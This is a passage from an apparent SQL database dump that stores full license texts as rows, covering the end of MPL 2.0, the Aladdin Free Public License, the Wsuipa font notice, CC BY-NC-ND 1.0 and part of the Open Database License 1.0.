Licenses\n\nIf You choose to distribute Source Code Form that is Incompatible With Secondary\nLicenses under the terms of this version of the License, the notice described\nin Exhibit B of this License must be attached. Exhibit A - Source Code Form\nLicense Notice\n\nThis Source Code Form is subject to the terms of the Mozilla Public License,\nv. 2.0. If a copy of the MPL was not distributed with this file, You can obtain\none at http://mozilla.org/MPL/2.0/.\n\nIf it is not possible or desirable to put the notice in a particular file,\nthen You may include the notice in a location (such as a LICENSE file in a\nrelevant directory) where a recipient would be likely to look for such a notice.\n\nYou may add additional accurate notices of copyright ownership.\n\nExhibit B - \"Incompatible With Secondary Licenses\" Notice\n\nThis Source Code Form is \"Incompatible With Secondary Licenses\", as defined\nby the Mozilla Public License, v. 2.0.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(31,'Aladdin','Aladdin Free Public License\n\n(Version 8, November 18, 1999)\n\nCopyright (C) 1994, 1995, 1997, 1998, 1999 Aladdin Enterprises,\n\nMenlo Park, California, U.S.A. All rights reserved. NOTE: This License is\nnot the same as any of the GNU Licenses published by the Free Software Foundation.\nIts terms are substantially different from those of the GNU Licenses. If you\nare familiar with the GNU Licenses, please read this license with extra care.\n\nAladdin Enterprises hereby grants to anyone the permission to apply this License\nto their own work, as long as the entire License (including the above notices\nand this paragraph) is copied with no changes, additions, or deletions except\nfor changing the first paragraph of Section 0 to include a suitable description\nof the work to which the license is being applied and of the person or entity\nthat holds the copyright in the work, and, if the License is being applied\nto a work created in a country other than the United States, replacing the\nfirst paragraph of Section 6 with an appropriate reference to the laws of\nthe appropriate country.\n\n 0. Subject Matter\n\nThis License applies to the computer program known as \"Aladdin Ghostscript.\"\nThe \"Program\", below, refers to such program. The Program is a copyrighted\nwork whose copyright is held by Aladdin Enterprises (the \"Licensor\"). Please\nnote that Aladdin Ghostscript is neither the program known as \"GNU Ghostscript\"\nnor the version of Ghostscript available for commercial licensing from Artifex\nSoftware Inc.\n\nA \"work based on the Program\" means either the Program or any derivative work\nof the Program, as defined in the United States Copyright Act of 1976, such\nas a translation or a modification.\n\nBY MODIFYING OR DISTRIBUTING THE PROGRAM (OR ANY WORK BASED ON THE PROGRAM),\nYOU INDICATE YOUR ACCEPTANCE OF THIS LICENSE TO DO SO, AND ALL ITS TERMS AND\nCONDITIONS FOR COPYING, DISTRIBUTING OR MODIFYING THE PROGRAM OR WORKS BASED\nON IT. NOTHING OTHER THAN THIS LICENSE GRANTS YOU PERMISSION TO MODIFY OR\nDISTRIBUTE THE PROGRAM OR ITS DERIVATIVE WORKS. THESE ACTIONS ARE PROHIBITED\nBY LAW. IF YOU DO NOT ACCEPT THESE TERMS AND CONDITIONS, DO NOT MODIFY OR\nDISTRIBUTE THE PROGRAM.\n\n 1. Licenses.\n\nLicensor hereby grants you the following rights, provided that you comply\nwith all of the restrictions set forth in this License and provided, further,\nthat you distribute an unmodified copy of this License with the Program:\n\n(a) You may copy and distribute literal (i.e., verbatim) copies of the Program\'s\nsource code as you receive it throughout the world, in any medium.\n\n(b) You may modify the Program, create works based on the Program and distribute\ncopies of such throughout the world, in any medium.\n\n 2. Restrictions.\n\n This license is subject to the following restrictions:\n\n(a) Distribution of the Program or any work based on the Program by a commercial\norganization to any third party is prohibited if any payment is made in connection\nwith such distribution, whether directly (as in payment for a copy of the\nProgram) or indirectly (as in payment for some service related to the Program,\nor payment for some product or service that includes a copy of the Program\n\"without charge\"; these are only examples, and not an exhaustive enumeration\nof prohibited activities). The following methods of distribution involving\npayment shall not in and of themselves be a violation of this restriction:\n\n(i) Posting the Program on a public access information storage and retrieval\nservice for which a fee is received for retrieving information (such as an\non-line service), provided that the fee is not content-dependent (i.e., the\nfee would be the same for retrieving the same volume of information consisting\nof random data) and that access to the service and to the Program is available\nindependent of any other product or service. An example of a service that\ndoes not fall under this section is an on-line service that is operated by\na company and that is only available to customers of that company. (This is\nnot an exhaustive enumeration.)\n\n(ii) Distributing the Program on removable computer-readable media, provided\nthat the files containing the Program are reproduced entirely and verbatim\non such media, that all information on such media be redistributable for non-commercial\npurposes without charge, and that such media are distributed by themselves\n(except for accompanying documentation) independent of any other product or\nservice. Examples of such media include CD-ROM, magnetic tape, and optical\nstorage media. (This is not intended to be an exhaustive list.) An example\nof a distribution that does not fall under this section is a CD-ROM included\nin a book or magazine. (This is not an exhaustive enumeration.)\n\n(b) Activities other than copying, distribution and modification of the Program\nare not subject to this License and they are outside its scope. Functional\nuse (running) of the Program is not restricted, and any output produced through\nthe use of the Program is subject to this license only if its contents constitute\na work based on the Program (independent of having been made by running the\nProgram).\n\n(c) You must meet all of the following conditions with respect to any work\nthat you distribute or publish that in whole or in part contains or is derived\nfrom the Program or any part thereof (\"the Work\"):\n\n(i) If you have modified the Program, you must cause the Work to carry prominent\nnotices stating that you have modified the Program\'s files and the date of\nany change. In each source file that you have modified, you must include a\nprominent notice that you have modified the file, including your name, your\ne-mail address (if any), and the date and purpose of the change;\n\n(ii) You must cause the Work to be licensed as a whole and at no charge to\nall third parties under the terms of this License;\n\n(iii) If the Work normally reads commands interactively when run, you must\ncause it, at each time the Work commences operation, to print or display an\nannouncement including an appropriate copyright notice and a notice that there\nis no warranty (or else, saying that you provide a warranty). Such notice\nmust also state that users may redistribute the Work only under the conditions\nof this License and tell the user how to view the copy of this License included\nwith the Work. (Exceptions: if the Program is interactive but normally prints\nor displays such an announcement only at the request of a user, such as in\nan \"About box\", the Work is required to print or display the notice only under\nthe same circumstances; if the Program itself is interactive but does not\nnormally print such an announcement, the Work is not required to print an\nannouncement.);\n\n(iv) You must accompany the Work with the complete corresponding machine-readable\nsource code, delivered on a medium customarily used for software interchange.\nThe source code for a work means the preferred form of the work for making\nmodifications to it. For an executable work, complete source code means all\nthe source code for all modules it contains, plus any associated interface\ndefinition files, plus the scripts used to control compilation and installation\nof the executable code. If you distribute with the Work any component that\nis normally distributed (in either source or binary form) with the major components\n(compiler, kernel, and so on) of the operating system on which the executable\nruns, you must also distribute the source code of that component if you have\nit and are allowed to do so;\n\n(v) If you distribute any written or printed material at all with the Work,\nsuch material must include either a written copy of this License, or a prominent\nwritten indication that the Work is covered by this License and written instructions\nfor printing and/or displaying the copy of the License on the distribution\nmedium;\n\n(vi) You may not impose any further restrictions on the recipient\'s exercise\nof the rights granted herein.\n\nIf distribution of executable or object code is made by offering the equivalent\nability to copy from a designated place, then offering equivalent ability\nto copy the source code from the same place counts as distribution of the\nsource code, even though third parties are not compelled to copy the source\ncode along with the object code.\n\n 3. Reservation of Rights.\n\nNo rights are granted to the Program except as expressly set forth herein.\nYou may not copy, modify, sublicense, or distribute the Program except as\nexpressly provided under this License. Any attempt otherwise to copy, modify,\nsublicense or distribute the Program is void, and will automatically terminate\nyour rights under this License. However, parties who have received copies,\nor rights, from you under this License will not have their licenses terminated\nso long as such parties remain in full compliance.\n\n 4. Other Restrictions.\n\nIf the distribution and/or use of the Program is restricted in certain countries\nfor any reason, Licensor may add an explicit geographical distribution limitation\nexcluding those countries, so that distribution is permitted only in or among\ncountries not thus excluded. In such case, this License incorporates the limitation\nas if written in the body of this License.\n\n 5. Limitations.\n\nTHE PROGRAM IS PROVIDED TO YOU \"AS IS,\" WITHOUT WARRANTY. THERE IS NO WARRANTY\nFOR THE PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nAND NONINFRINGEMENT OF THIRD PARTY RIGHTS. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE,\nYOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\nIN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL\nLICENSOR, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM\nAS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL,\nINCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO\nUSE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED\nINACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE\nPROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER\nPARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 6. General.\n\nThis License is governed by the laws of the State of California, U.S.A., excluding\nchoice of law rules.\n\nIf any part of this License is found to be in conflict with the law, that\npart shall be interpreted in its broadest meaning consistent with the law,\nand no other parts of the License shall be affected.\n\nFor United States Government users, the Program is provided with RESTRICTED\nRIGHTS. If you are a unit or agency of the United States Government or are\nacquiring the Program for any such unit or agency, the following apply:\n\nIf the unit or agency is the Department of Defense (\"DOD\"), the Program and\nits documentation are classified as \"commercial computer software\" and \"commercial\ncomputer software documentation\" respectively and, pursuant to DFAR Section\n227.7202, the Government is acquiring the Program and its documentation in\naccordance with the terms of this License. If the unit or agency is other\nthan DOD, the Program and its documentation are classified as \"commercial\ncomputer software\" and \"commercial computer software documentation\" respectively\nand, pursuant to FAR Section 12.212, the Government is acquiring the Program\nand its documentation in accordance with the terms of this License.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(32,'Wsuipa','This file was added by Clea F. Rees on 2008/11/30 with the permission of Dean\nGuenther and pointers to this file were added to all source files.\n\nUnlimited copying and redistribution of each of the files is permitted as\nlong as the file is not modified. Modifications, and redistribution of modified\nversions, are also permitted, but only if the resulting file is renamed.\n\nThe copyright holder is Washington State University. The original author of\nthe fonts is Janene Winter. The primary contact (as of 2008) is Dean Guenther.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(33,'CC-BY-NC-ND-1.0','Creative Commons Attribution-NoDerivs-NonCommercial 1.0 CREATIVE COMMONS CORPORATION\nIS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS\nDRAFT LICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS\nPROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\nb. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested.\n\nb. You may not exercise any of the rights granted to You in Section 3 above\nin any manner that is primarily intended for or directed toward commercial\nadvantage or private monetary compensation. The exchange of the Work for other\ncopyrighted works by means of digital file-sharing or otherwise shall not\nbe considered to be intended for or directed toward commercial advantage or\nprivate monetary compensation, provided there is no payment of any monetary\ncompensation in connection with the exchange of copyrighted works.\n\nc. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Collective Works, You must keep intact all copyright\nnotices for the Work and give the Original Author credit reasonable to the\nmedium or means You are utilizing by conveying the name (or pseudonym if applicable)\nof the Original Author if supplied; the title of the Work if supplied. Such\ncredit may be implemented in any reasonable manner; provided, however, that\nin the case of a Collective Work, at a minimum such credit will appear where\nany other comparable authorship credit appears and in a manner at least as\nprominent as such other comparable authorship credit.\n\n 5. Representations, Warranties and Disclaimer\n\na. By offering the Work for public release under this License, Licensor represents\nand warrants that, to the best of Licensor\'s knowledge after reasonable inquiry:\n\ni. Licensor has secured all rights in the Work necessary to grant the license\nrights hereunder and to permit the lawful exercise of the rights granted hereunder\nwithout You having any obligation to pay any royalties, compulsory license\nfees, residuals or any other payments;\n\nii. The Work does not infringe the copyright, trademark, publicity rights,\ncommon law rights or any other right of any third party or constitute defamation,\ninvasion of privacy or other tortious injury to any third party.\n\nb. EXCEPT AS EXPRESSLY STATED IN THIS LICENSE OR OTHERWISE AGREED IN WRITING\nOR REQUIRED BY APPLICABLE LAW, THE WORK IS LICENSED ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION,\nANY WARRANTIES REGARDING THE CONTENTS OR ACCURACY OF THE WORK.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nAND EXCEPT FOR DAMAGES ARISING FROM LIABILITY TO A THIRD PARTY RESULTING FROM\nBREACH OF THE WARRANTIES IN SECTION 5, IN NO EVENT WILL LICENSOR BE LIABLE\nTO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE\nOR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN\nIF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Collective Works from You under this License, however, will\nnot have their licenses terminated provided such individuals or entities remain\nin full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will\nsurvive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nc. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\nd. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(34,'ODbL-1.0','ODC Open Database License (ODbL) Preamble\n\nThe Open Database License (ODbL) is a license agreement intended to allow\nusers to freely share, modify, and use this Database while maintaining this\nsame freedom for others. Many databases are covered by copyright, and therefore\nthis document licenses these rights. Some jurisdictions, mainly in the European\nUnion, have specific rights that cover databases, and so the ODbL addresses\nthese rights, too. Finally, the ODbL is also an agreement in contract for\nusers of this Database to act in certain ways in return for accessing this\nDatabase.\n\nDatabases can contain a wide variety of types of content (images, audiovisual\nmaterial, and sounds all in the same database, for example), and so the ODbL\nonly governs the rights over the Database, and not the contents of the Database\nindividually. Licensors should use the ODbL together with another license\nfor the contents, if the contents have a single set of rights that uniformly\ncovers all of the contents. If the contents have multiple sets of different\nrights, Licensors should describe what rights govern what contents together\nin the individual record or in some other way that clarifies what rights apply.\n\nSometimes the contents of a database, or the database itself, can be covered\nby other rights not addressed here (such as private contracts, trade mark\nover the name, or privacy rights / data protection rights over information\nin the contents), and so you are advised that you may have to consult other\ndocuments or clear other rights before doing activities not covered by this\nLicense.\n\n------\n\nThe Licensor (as defined below)\n\nand\n\nYou (as defined below)\n\nagree as follows:\n\n 1.0 Definitions of Capitalised Words\n\n\"Collective Database\" - Means this Database in unmodified form as part of\na collection of independent databases in themselves that together are assembled\ninto a collective whole. A work that constitutes a Collective Database will\nnot be considered a Derivative Database.\n\n\"Convey\" - As a verb, means Using the Database, a Derivative Database, or\nthe Database as part of a Collective Database in any way that enables a Person\nto make or receive copies of the Database or a Derivative Database. Conveying\ndoes not include interaction with a user through a computer network, or creating\nand Using a Produced Work, where no transfer of a copy of the Database or\na Derivative Database occurs.\n\n\"Contents\" - The contents of this Database, which includes the information,\nindependent works, or other material collected into the Database. For example,\nthe contents of the Database could be factual data or works such as images,\naudiovisual material, text, or sounds.\n\n\"Database\" - A collection of material (the Contents) arranged in a systematic\nor methodical way and individually accessible by electronic or other means\noffered under the terms of this License.\n\n\"Database Directive\" - Means Directive 96/9/EC of the European Parliament\nand of the Council of 11 March 1996 on the legal protection of databases,\nas amended or succeeded.\n\n\"Database Right\" - Means rights resulting from the Chapter III (\"sui generis\")\nrights in the Database Directive (as amended and as transposed by member states),\nwhich includes the Extraction and Re-utilisation of the whole or a Substantial\npart of the Contents, as well as any similar rights available in the relevant\njurisdiction under Section 10.4.\n\n\"Derivative Database\" - Means a database based upon the Database, and includes\nany translation, adaptation, arrangement, modification, or any other alteration\nof the Database or of a Substantial part of the Contents. This includes, but\nis not limited to, Extracting or Re-utilising the whole or a Substantial part\nof the Contents in a new Database.\n\n\"Extraction\" - Means the permanent or temporary transfer of all or a Substantial\npart of the Contents to another medium by any means or in any form.\n\n\"License\" - Means this license agreement and is both a license of rights such\nas copyright and Database Rights and an agreement in contract.\n\n\"Licensor\" - Means the Person that offers the Database under the terms of\nthis License.\n\n\"Person\" - Means a natural or legal person or a body of persons corporate\nor incorporate.\n\n\"Produced Work\" - a work (such as an image, audiovisual material, text, or\nsounds) resulting from using the whole or a Substantial part of the Contents\n(via a search or other query) from this Database, a Derivative Database, or\nthis Database as part of a Collective Database.\n\n\"Publicly\" - means to Persons other than You or under Your control by either\nmore than 50% ownership or by the power to direct their activities (such as\ncontracting with an independent consultant).\n\n\"Re-utilisation\" - means any form of making available to the public all or\na Substantial part of the Contents by the distribution of copies, by renting,\nby online or other forms of transmission.\n\n\"Substantial\" - Means substantial in terms of quantity or quality or a combination\nof both. The repeated and systematic Extraction or Re-utilisation of insubstantial\nparts of the Contents may amount to the Extraction or Re-utilisation of a\nSubstantial part of the Contents.\n\n\"Use\" - As a verb, means doing any act that is restricted by copyright or\nDatabase Rights whether in the original medium or any other; and includes\nwithout limitation distributing, copying, publicly performing, publicly displaying,\nand preparing derivative works of the Database, as well as modifying the Database\nas may be technically necessary to use it in a different mode or format.\n\n\"You\" - Means a Person exercising rights under this License who has not previously\nviolated the terms of this License with respect to the Database, or who has\nreceived express permission from the Licensor to exercise rights under this\nLicense despite a previous violation.\n\n Words in the singular include the plural and vice versa.\n\n 2.0 What this License covers\n\n 2.1. Legal effect of this document. This License is:\n\n a. A license of applicable copyright and neighbouring rights;\n\n b. A license of the Database Right; and\n\n c. An agreement in contract between You and the Licensor.\n\n2.2 Legal rights covered. This License covers the legal rights in the Database,\nincluding:\n\na. Copyright. Any copyright or neighbouring rights in the Database. The copyright\nlicensed includes any individual elements of the Database, but does not cover\nthe copyright over the Contents independent of this Database. See Section\n2.4 for details. Copyright law varies between jurisdictions, but is likely\nto cover: the Database model or schema, which is the structure, arrangement,\nand organisation of the Database, and can also include the Database tables\nand table indexes; the data entry and output sheets; and the Field names of\nContents stored in the Database;\n\nb. Database Rights. Database Rights only extend to the Extraction and Re-utilisation\nof the whole or a Substantial part of the Contents. Database Rights can apply\neven when there is no copyright over the Database. Database Rights can also\napply when the Contents are removed from the Database and are selected and\narranged in a way that would not infringe any applicable copyright; and\n\nc. Contract. This is an agreement between You and the Licensor for access\nto the Database. In return you agree to certain conditions of use on this\naccess as outlined in this License.\n\n 2.3 Rights not covered.\n\na. This License does not apply to computer programs used in the making or\noperation of the Database;\n\nb. This License does not cover any patents over the Contents or the Database;\nand\n\nc. This License does not cover any trademarks associated with the Database.\n\n2.4 Relationship to Contents in the Database. The individual items of the\nContents contained in this Database may be covered by other rights, including\ncopyright, patent, data protection, privacy, or personality rights, and this\nLicense does not cover any rights (other than Database Rights or in contract)\nin individual Contents contained in the Database. For example, if used on\na Database of images (the Contents), this License would not apply to copyright\nover individual images, which could have their own separate licenses, or one\nsingle license covering all of the rights over the images.\n\n 3.0 Rights granted\n\n3.1 Subject to the terms and conditions of this License, the Licensor grants\nto You a worldwide, royalty-free, non-exclusive, terminable (but only under\nSection 9) license to Use the Database for the duration of any applicable\ncopyright and Database Rights. These rights explicitly include commercial\nuse, and do not exclude any field of endeavour. To the extent possible in\nthe relevant jurisdiction, these rights may be exercised in all media and\nformats whether now known or created in the future.\n\n The rights granted cover, for example:\n\na. Extraction and Re-utilisation of the whole or a Substantial part of the\nContents;\n\n b. Creation of Derivative Databases;\n\n c. Creation of Collective Databases;\n\nd. Creation of temporary or permanent reproductions by any means and in any\nform, in whole or in part, including of any Derivative Databases or as a part\nof Collective Databases; and\n\ne. Distribution, communication, display, lending, making available, or performance\nto the public by any means and in any form, in whole or in part, including\nof any Derivative Database or as a part of Collective Databases.\n\n 3.2 Compulsory license schemes. For the avoidance of doubt:\n\na. Non-waivable compulsory license schemes. In those jurisdictions in which\nthe right to collect royalties through any statutory or compulsory licensing\nscheme cannot be waived, the Licensor reserves the exclusive right to collect\nsuch royalties for any exercise by You of the rights granted under this License;\n\nb. Waivable compulsory license schemes. In those jurisdictions in which the\nright to collect royalties through any statutory or compulsory licensing scheme\ncan be waived, the Licensor waives the exclusive right to collect such royalties\nfor any exercise by You of the rights granted under this License; and,\n\nc. Voluntary license schemes. The Licensor waives the right to collect royalties,\nwhether individually or, in the event that the Licensor is a member of a collecting\nsociety that administers voluntary licensing schemes, via that society, from\nany exercise by You of the rights granted under this License.\n\n3.3 The right to release the Database under different terms, or to stop distributing\nor making available the Database, is reserved. Note that this Database may\nbe multiple-licensed, and so You may have the choice of using alternative\nlicenses for this Database. Subject to Section 10.4, all other rights not\nexpressly granted by Licensor are reserved.\n\n 4.0 Conditions of Use\n\n4.1 The rights granted in Section 3 above are expressly made subject to Your\ncomplying with the following conditions of use. These are important conditions\nof this License, and if You fail to follow them, You will be in material breach\nof its terms.\n\n4.2 Notices. If You Publicly Convey this Database, any Derivative Database,\nor the Database as part of a Collective Database, then You must:\n\na. Do so only under the terms of this License or another license permitted\nunder Section 4.4;\n\nb. Include a copy of this License (or, as applicable, a license permitted\nunder Section 4.4) or its Uniform Resource Identifier (URI) with the Database\nor Derivative Database, including both in the Database or Derivative Database\nand in any relevant documentation; and\n\nc. Keep intact any copyright or Database Right notices and notices that refer\nto this License.\n\nd. If it is not possible to put the required notices in a particular file\ndue to its structure, then You must include the notices in a location (such\nas a relevant directory) where users would be likely to look for it.\n\n4.3 Notice for using output (Contents). Creating and Using a Produced Work\ndoes not require the notice in Section 4.2. However, if you Publicly Use a\nProduced Work, You must include a notice associated with the Produced Work\nreasonably calculated to make any Person that uses, views, accesses, interacts\nwith, or is otherwise exposed to the Produced Work aware that Content was\nobtained from the Database, Derivative Database, or the Database as part of\na Collective Database, and that it is available under this License.\n\na. Example notice. The following text will satisfy notice under Section 4.3:\n\nContains information from DATABASE NAME, which is made available here under\nthe Open Database License (ODbL).\n\nDATABASE NAME should be replaced with the name of the Database and a hyperlink\nto the URI of the Database. \"Open Database License\" should contain a hyperlink\nto the URI of the text of this License. If hyperlinks are not possible, You\nshould include the plain text of the required URI\'s with the above notice.\n\n 4.4 Share alike.\n\na. Any Derivative Database that You Publicly Use must be only under the terms\nof:\n\n i. This License;\n\nii. A later version of this License similar in spirit to this License; or\n\n iii. A compatible license.\n\nIf You license the Derivative Database under one of the licenses mentioned\nin (iii), You must comply with the terms of that license.\n\nb. For the avoidance of doubt, Extraction or Re-utilisation of the whole or\na Substantial part of the Contents into a new database is a Derivative Database\nand must comply with Section 4.4.\n\nc. Derivative Databases and Produced Works. A Derivative Database is Publicly\nUsed and so must comply with Section 4.4. if a Produced Work created from\nthe Derivative Database is Publicly Used.\n\nd. Share Alike and additional Contents. For the avoidance of doubt, You must\nnot add Contents to Derivative Databases under Section 4.4 a that are incompatible\nwith the rights granted under this License.\n\ne. Compatible licenses. Licensors may authorise a proxy to determine compatible\nlicenses under Section 4.4 a iii. If they do so, the authorised proxy\'s public\nstatement of acceptance of a compatible license grants You permission to use\nthe compatible license.\n\n4.5 Limits of Share Alike. The requirements of Section 4.4 do not apply in\nthe following:\n\na. For the avoidance of doubt, You are not required to license Collective\nDatabases under this License if You incorporate this Database or a Derivative\nDatabase in the collection, but this License still applies to this Database\nor a Derivative Database as a part of the Collective Database;\n\nb. Using this Database, a Derivative Database, or this Database as part of\na Collective Database to create a Produced Work does not create a Derivative\nDatabase for purposes of Section 4.4; and\n\nc. Use of a Derivative Database internally within an organisation is not to\nthe public and therefore does not fall under the requirements of Section 4.4.\n\n4.6 Access to Derivative Databases. If You Publicly Use a Derivative Database\nor a Produced Work from a Derivative Database, You must also offer to recipients\nof the Derivative Database or Produced Work a copy in a machine readable form\nof:\n\n a. The entire Derivative Database; or\n\nb. A file containing all of the alterations made to the Database or the method\nof making the alterations to the Database (such as an algorithm), including\nany additional Contents, that make up all the differences between the Database\nand the Derivative Database.\n\nThe Derivative Database (under a.) or alteration file (under b.) must be available\nat no more than a reasonable production cost for physical distributions and\nfree of charge if distributed over the internet.\n\n 4.7 Technological measures and additional terms\n\na. This License does not allow You to impose (except subject to Section 4.7\nb.) any terms or any technological measures on the Database, a Derivative\nDatabase, or the whole or a Substantial part of the Contents that alter or\nrestrict the terms of this License, or any rights granted under it, or have\nthe effect or intent of restricting the ability of any person to exercise\nthose rights.\n\nb. Parallel distribution. You may impose terms or technological measures on\nthe Database, a Derivative Database, or the whole or a Substantial part of\nthe Contents (a \"Restricted Database\") in contravention of Section 4.74 a.\nonly if You also make a copy of the Database or a Derivative Database available\nto the recipient of the Restricted Database:\n\n i. That is available without additional fee;\n\nii. That is available in a medium that does not alter or restrict the terms\nof this License, or any rights granted under it, or have the effect or intent\nof restricting the 